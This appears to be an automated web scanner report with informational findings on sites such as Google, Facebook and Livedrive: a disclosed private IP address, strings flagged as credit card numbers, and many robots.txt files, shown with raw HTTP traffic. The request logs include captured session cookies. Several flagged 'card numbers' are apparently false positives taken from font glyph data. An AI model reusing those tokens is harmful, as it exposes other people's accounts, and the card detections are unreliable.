Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<meta name="WT.sv" content="172.20.202.38" />
...[SNIP]...

24.253. http://www.google.com/sdch/StnTz5pY.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD
If-Modified-Since: Mon, 18 Jul 2011 08:58:40 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 19 Jul 2011 14:01:23 GMT
Date: Tue, 19 Jul 2011 14:20:13 GMT
Expires: Tue, 19 Jul 2011 14:20:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &hl=en&ct=clnk&gl=us&source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

25. Credit card numbers disclosed previous next
There are 3 instances of this issue:

http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.livedrive.com/Scripts/colaborate-medium_regular.typeface.js

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

25.1. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following credit card numbers were disclosed in the response:

30230413055200
30552013087360
36019213634080

Request

Response

25.2. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following credit card numbers were disclosed in the response:

3584388136297600
4128852141742240
4945548149909200
5172408152177800

Request

Response

25.3. http://www.livedrive.com/Scripts/colaborate-medium_regular.typeface.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/Scripts/colaborate-medium_regular.typeface.js

Issue detail

The following credit card numbers were disclosed in the response:

4341047458988434
4441000383975405
5007386924470573
5242713786252697
5849384871000511

Request

GET /Scripts/colaborate-medium_regular.typeface.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 08:27:36 GMT
Accept-Ranges: bytes
ETag: "0ce452319cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:22:36 GMT
Connection: close
Content-Length: 67466

if (_typeface_js && _typeface_js.loadFace) _typeface_js.loadFace({"glyphs":{"S":{"x_min":89,"x_max":728.953125,"ha":825,"o":"m 728 233 b 447 536 728 430 576 490 b 266 669 351 570 266 597 b 433 781 266
...[SNIP]...
536 768 l 806 118 "},"..":{"x_min":34.71875,"x_max":965.28125,"ha":1000,"o":"m 965 450 b 500 913 965 713 763 913 b 34 450 240 913 34 711 b 500 -13 34 188 240 -13 b 965 450 759 -13 965 188 m 869 450 b 500 73 869 244 705 73 b 130 450 294 73 130 244 b 500 826 130 658 290 826 b 869 450 708 826 869 656 m 654 187 l 622 276 b 501 243 579 258 545 243 b 362 448 398 243 362 316 b 505 647 362 573 400 647 b 615 618 545 647 580 633
...[SNIP]...
587 372 l 359 372 l 477 704 l 587 372 m 608 1045 b 492 1159 608 1111 558 1159 b 377 1045 428 1159 377 1109 b 492 931 377 983 430 931 b 608 1045 556 931 608 981 m 549 1047 b 492 988 549 1016 531 988 b 434 1047 458 988 434 1020 b 492 1105 434 1076 458 1105 b 549 1047 528 1105 549 1079 "},"..":{"x_min":75,"x_max":994.453125,"ha":1069,"o":"m 994 0 l 606 898 l 462 898 l 75 0 l 994 0 m 806 118 l 265 118 l 536 768 l 806 118
...[SNIP]...
9 311 761 287 793 b 346 877 287 848 311 877 b 403 819 382 877 403 851 "},"..":{"x_min":0,"x_max":0,"ha":375},"0":{"x_min":52.78125,"x_max":697.21875,"ha":750,"o":"m 697 427 b 373 862 697 697 627 862 b 52 427 137 862 52 697 b 372 -23 52 155 118 -23 b 697 427 629 -23 697 156 m 522 427 b 372 106 522 241 505 106 b 227 427 237 106 227 231 b 373 731 227 591 238 731 b 522 427 508 731 522 620 "},"...":{"x_min":55.5625,"x_max":5
...[SNIP]...
08 b 262 446 338 108 262 199 b 505 782 262 682 340 782 b 744 446 668 782 744 685 m 736 1050 l 652 1090 b 581 1027 645 1066 620 1027 b 445 1090 538 1027 505 1090 b 290 985 368 1090 325 1066 l 373 946 b 444 1000 383 975 405 1000 b 584 938 487 1000 511 938 b 736 1050 652 938 713 981 "},"..":{"x_min":75,"x_max":677.78125,"ha":738,"o":"m 677 320 b 415 652 677 497 605 652 b 248 551 337 652 284 601 l 248 912 l 91 912 l 91 194 b 75 -279 91 114 84 -204 l
...[SNIP]...
462 285 l 462 182 "},"..":{"x_min":34.71875,"x_max":965.28125,"ha":1000,"o":"m 965 450 b 500 913 965 713 763 913 b 34 450 240 913 34 711 b 500 -13 34 188 240 -13 b 965 450 759 -13 965 188 m 869 450 b 500 73 869 244 705 73 b 130 450 294 73 130 244 b 500 826 130 658 290 826 b 869 450 708 826 869 656 m 726 179 l 556 406 b 690 562 658 422 690 490 b 506 720 690 690 593 720 l 305 720 l 305 179 l 411 179 l 411 404 l 433 404 l
...[SNIP]...

26. Robots.txt file previous next
There are 86 instances of this issue:

http://0.gravatar.com/avatar/a9253565cd7a0a613c1147db0e66e6f0
http://040-eex-147.mktoresp.com/webevents/visitWebPage
http://1.gravatar.com/avatar/16984fd773fe4e40c9cb0e60ff81e600
http://624-vqc-743.mktoresp.com/webevents/visitWebPage
http://a.netmng.com/hic/
http://a.ok.facebook.com/cm/bk/9998-58063-3840-0
http://a.tribalfusion.com/j.ad
http://a1.bing4.com/imagenewsfetcher.aspx
http://a2.bing4.com/imagenewsfetcher.aspx
http://a3.bing4.com/imagenewsfetcher.aspx
http://a4.bing4.com/imagenewsfetcher.aspx
http://ad.doubleclick.net/activity
http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
http://ads.undertone.com/l
http://api.bing.com/qsonhs.aspx
http://b.scorecardresearch.com/b
http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
http://bing.fansnap.com/la/pi
http://blog.linode.com/2011/07/13/introducing-nodebalancer/
http://boston.com/favicon.ico
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://cache.boston.com/universal/js/twitterwidget.js
http://cache.specificmedia.com/creative/blank.gif
http://cdn.stumble-upon.com/css/global_su.css
http://cdn.turn.com/server/ddc.htm
http://cgi.ebay.com/favicon.ico
http://cheetah.vizu.com/a.gif
http://cm.g.doubleclick.net/pixel
http://creatives.as4x.tmcs.net/tmsandbox3a.html
http://digg.com/ajax/tooltip/submit
http://farecastcom.122.2o7.net/b/ss/farecastcom/1/H.15.1/s76965045684482
http://feeds.bbci.co.uk/news/rss.xml
http://fonts.googleapis.com/css
http://g-pixel.invitemedia.com/gmatcher
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052447870/
http://ibegin.com/
http://in.getclicky.com/in.php
http://l.addthiscdn.com/live/t00/250lo.gif
http://metrics.boston.com/b/ss/nytbglobe/1/H.20.3/s81497499125071
http://metrics.ticketmaster.com/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871
http://metrics.versionone.com/b/ss/vonenewprod/1/H.17/s66275241293478
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://odb.outbrain.com/utils/ping.html
http://pixel.invitemedia.com/admeld_sync
http://pixel.quantserve.com/seg/r
http://profile.live.com/badge
http://puma.vizu.com/cdn/00/00/21/04/smart_tag.js
http://r.turn.com/server/pixel.htm
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977
http://rover.ebay.com/rover/1/711-53200-19255-0/1
http://rt.legolas-media.com/lgrt
http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://segment-pixel.invitemedia.com/pixel
http://srx.main.ebayrtm.com/rtm
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://stubhub-www.baynote.net/baynote/tags3/common
http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard
http://tag.admeld.com/ad/js/610/bostonglobe/728x90/bg_1064637_61606218
http://themes.googleusercontent.com/font
http://umfcluj.ro/js/jquery.validate.js
http://wa.stubhub.com/b/ss/stubhub/1/H.22.1/s88119992504362
http://www.adminitrack.com/
http://www.atlassian.com/software/jira
http://www.axosoft.com/
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html
http://www.clickmanage.com/events/clickevent.aspx
http://www.facebook.com/plugins/like.php
http://www.factset.com/
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1052447870/
http://www.ibegin.com/media/site/images/logo.gif
http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx
http://www.linode.com/index.cfm
http://www.livedrive.com/
http://www.myspace.com/favicon.ico
http://www.netlogiq.ro/js/jquery.validate.js
http://www.numarasoftware.com/welcome/service_desk.aspx
http://www.rallydev.com/js/scriptaculous.js
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.seapine.com/ttpro.html
http://www.stubhub.com/content/getPromoContent
http://www.stumbleupon.com/submit
http://www.techexcel.com/products/devsuite/devteststudio.html
http://www.ticketmaster.com/event/000043582C516D43

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

26.1. http://0.gravatar.com/avatar/a9253565cd7a0a613c1147db0e66e6f0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/avatar/a9253565cd7a0a613c1147db0e66e6f0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

26.2. http://040-eex-147.mktoresp.com/webevents/visitWebPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://040-eex-147.mktoresp.com
Path:	/webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 040-eex-147.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:37 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "5d21f5-18-3ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.3. http://1.gravatar.com/avatar/16984fd773fe4e40c9cb0e60ff81e600 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1.gravatar.com
Path:	/avatar/16984fd773fe4e40c9cb0e60ff81e600

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

26.4. http://624-vqc-743.mktoresp.com/webevents/visitWebPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://624-vqc-743.mktoresp.com
Path:	/webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 624-vqc-743.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:45 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "458d85-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.5. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:10 GMT
Server: Apache/2.2.9
Last-Modified: Wed, 27 Oct 2010 13:56:47 GMT
ETag: "18063c-1a-4939998a3e5c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.6. http://a.ok.facebook.com/cm/bk/9998-58063-3840-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.ok.facebook.com
Path:	/cm/bk/9998-58063-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.ok.facebook.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:57:51 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

26.7. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.8. http://a1.bing4.com/imagenewsfetcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.bing4.com
Path:	/imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15551243
Date: Tue, 19 Jul 2011 12:23:40 GMT
Connection: close

User-agent: *
Disallow: /

26.9. http://a2.bing4.com/imagenewsfetcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a2.bing4.com
Path:	/imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14210744
Date: Tue, 19 Jul 2011 12:23:43 GMT
Connection: close

User-agent: *
Disallow: /

26.10. http://a3.bing4.com/imagenewsfetcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a3.bing4.com
Path:	/imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a3.bing4.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Cache-Control: public, max-age=15552000
Date: Tue, 19 Jul 2011 12:23:50 GMT
Connection: close

User-agent: *
Disallow: /

26.11. http://a4.bing4.com/imagenewsfetcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a4.bing4.com
Path:	/imagenewsfetcher.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 01 May 2010 21:49:12 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 26
Cache-Control: public, max-age=14879884
Date: Tue, 19 Jul 2011 23:01:40 GMT
Connection: close

User-agent: *
Disallow: /

26.12. http://ad.doubleclick.net/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 19 Jul 2011 14:58:33 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2003 22:04:31 GMT
ETag: "22ffd3-87-3c4e1b86d79c0"
Accept-Ranges: bytes
Content-Length: 135
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/

26.14. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 22:26:02 GMT
ETag: "53000e-1a-4a7e6c8eaf280"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 20:42:55 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.15. http://api.bing.com/qsonhs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bing.com
Path:	/qsonhs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Content-Length: 1907
Content-Type: text/plain
Last-Modified: Wed, 01 Jun 2011 23:39:52 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Akamai-TestID: b22488a5e5b941f8bf0992c37c5e8db7
Cache-Control: public, max-age=12049435
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

26.16. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

26.18. http://bing.fansnap.com/la/pi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/la/pi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bing.fansnap.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
X-Runtime: 1
ETag: "f71d20196d4caf35b6a670db8c70b03d"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CXaKeGBjoLb2Zmc2V0af6QnQ%3D%3D--6716d6e12c1a428e86490bcfee9193c657c427bd; domain=fansnap.com; path=/; HttpOnly
Content-Length: 26
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

26.19. http://blog.linode.com/2011/07/13/introducing-nodebalancer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.linode.com
Path:	/2011/07/13/introducing-nodebalancer/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.linode.com

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 14:31:40 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Cookie
X-Pingback: http://blog.linode.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.20. http://boston.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: boston.com

Response

